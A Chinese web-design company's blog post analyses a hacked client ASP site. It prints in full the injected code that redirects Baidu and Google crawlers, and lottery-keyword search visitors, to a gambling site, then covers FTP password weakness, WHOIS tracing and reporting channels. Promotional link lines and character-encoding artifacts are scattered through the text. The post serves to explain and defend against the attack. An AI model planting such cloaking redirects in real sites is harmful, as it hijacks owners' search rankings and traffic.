前幾日，我的客戶(hù)電話(huà)說(shuō)自己的百度排名沒(méi)有了，查詢(xún)下竟然百度標簽顯示的內容是一家彩票平臺的網(wǎng)站內容。 我知道網(wǎng)站被黑客加入了非法代碼，惡意篡改了百度快照。(截圖如下)

　　查看“百度快照”出現的是一組跳轉網(wǎng)站的廣告內容。我們對客戶(hù)設置的網(wǎng)站信息消失了。

　　1、黑客是如何修改百度快照的呢?

　　我進(jìn)行了排查，客戶(hù)的網(wǎng)站是使用asp源碼開(kāi)發(fā)的。發(fā)現有個(gè)文件被黑客寫(xiě)入了一段代碼。西安市網(wǎng)頁(yè)制作公司,西安網(wǎng)站建設推薦閱讀>>> 關(guān)于網(wǎng)站快照不更新的一點(diǎn)看法,

　　路徑：Inc文件夾—SysProduct.asp文件里面最底下添加了如下代碼：

　　<%

　　function Getbot()

　　dim s_agent

　　GetBot=""

　　s_agent=Request.ServerVariables("HTTP_USER_AGENT")

　　if instr(1,s_agent,"googlebot",1) > 0 then

　　GetBot="google"

　　end if

　　if instr(1,s_agent,"baiduspider",1) > 0 then

　　GetBot="baidu"

　　end if

　　end function

　　if GetBot="baidu" or GetBot="google" then

　　'

　　Response.Redirect "http://*********"（跳轉的網(wǎng)站，引導百度抓取的內容）

　　else

　　'

　　Response.Write"<script type=""text/javascript"">var d=document.referrer;var re=/((wd|q|w|p|query)(=)([%A-Z0-9]*)(%E4%B8%A4%E5%85%83%E5%BD%A9%E7%A5%A8|%E4%B8%A4%E5%85%83%E5%BD%A9%E7%A5%A8%E7%BD%91|%E4%B8%A4%E5%85%83%E5%BD%A9%E7%A5%A8%E5%AE%98%E7%BD%91|%E4%B8%A4%E5%85%83%E5%BD%A9%E7%A5%A8%E5%B9%B3%E5%8F%B0))/;if(re.test(d)){self.location='http://*********';（目標網(wǎng)站）window.adworkergo='ad_app6'}else{}</script>"

　　end if

　　%>

　　黑客設置的這串代碼導致百度爬蟲(chóng)抓取網(wǎng)頁(yè)的時(shí)候，直接抓取越過(guò)客戶(hù)網(wǎng)站抓取了跳轉網(wǎng)站內容，導致百度快照里面顯示的是別的內容。使得客戶(hù)本來(lái)排名首頁(yè)的網(wǎng)站直接被百度屏蔽了。造成了客戶(hù)很大的損失。

　　2、那么黑客是如何進(jìn)入后臺的呢?

　　黑客要進(jìn)入后臺，必須知道FTP賬戶(hù)和密碼，以及IP地址。西安給公司建網(wǎng)頁(yè),西安網(wǎng)站建設推薦閱讀>>> 網(wǎng)站快照日期更新取決于什么因素,

　　造成的原因有如下幾種：

　　1)一方面是FTP密碼設置的時(shí)候比較簡(jiǎn)單化，很容易被利用軟件破解掉，

　　2)另一方面選擇便宜的空間也是一種隱患。因為空間IP以及用戶(hù)名是很難被知道的，除非有人提供。

　　3、網(wǎng)站被黑之后，你如何追查黑客的來(lái)源?

　　方法比較簡(jiǎn)單，就是查詢(xún)你跳轉的目標網(wǎng)站的域名信息。一般情況下，都是一些小型的站長(cháng)開(kāi)發(fā)的賺錢(qián)網(wǎng)站，通過(guò)查詢(xún)域名信息你可以獲知該域名的歸屬人是誰(shuí)，他有可能就是黑你網(wǎng)站的人。

　　如果是比較大型的網(wǎng)站利用外包的方式進(jìn)行推廣，那么你也可以得知負責人，給百度或者是網(wǎng)絡(luò )警察舉報一下，該網(wǎng)站存在惡意攻擊修改內容的行為，畢竟它也有一定得責任。西安 網(wǎng)站建設,西安網(wǎng)站建設推薦閱讀>>> 為什么百度快照直接跳轉到網(wǎng)頁(yè)上,

　　通過(guò)中國萬(wàn)網(wǎng)Whois域名查詢(xún)：比如我客戶(hù)跳轉的彩票網(wǎng)站的域名信息如下：

　　1)第一個(gè)是：注冊人

　　2)第二個(gè)是：聯(lián)系電話(huà)

　　3)第三個(gè)是：聯(lián)系郵箱

　　基本上你聯(lián)系注冊人就可以解決問(wèn)題。如果對你客戶(hù)造成的損失太大的話(huà)，建議你通過(guò)以下方式進(jìn)行維權：

　　違法和不良信息舉報中心：http://net.china.cn/

　　12321網(wǎng)絡(luò )不良與垃圾信息舉報受理中心：http://www.12321.cn/

　　國家互聯(lián)網(wǎng)應急中心網(wǎng)絡(luò )安全舉報中心：http://www.cert.org.cn/

　　中國反釣魚(yú)網(wǎng)站聯(lián)盟認定及處理流程： http://www.cnnic.cn/

　　公安部信息網(wǎng)絡(luò )安全報警網(wǎng)站：http://www.cyberpolice.cn/wfjb/

　　中國掃黃打非網(wǎng)：http://www.shdf.gov.cn/

　　北京市公安局網(wǎng)絡(luò )違法犯罪舉報網(wǎng)站：http://www.bj.cyberpolice.cn/index.jsp

　　希望本篇文章對你防黑有幫助。

　　作者：網(wǎng)牛天下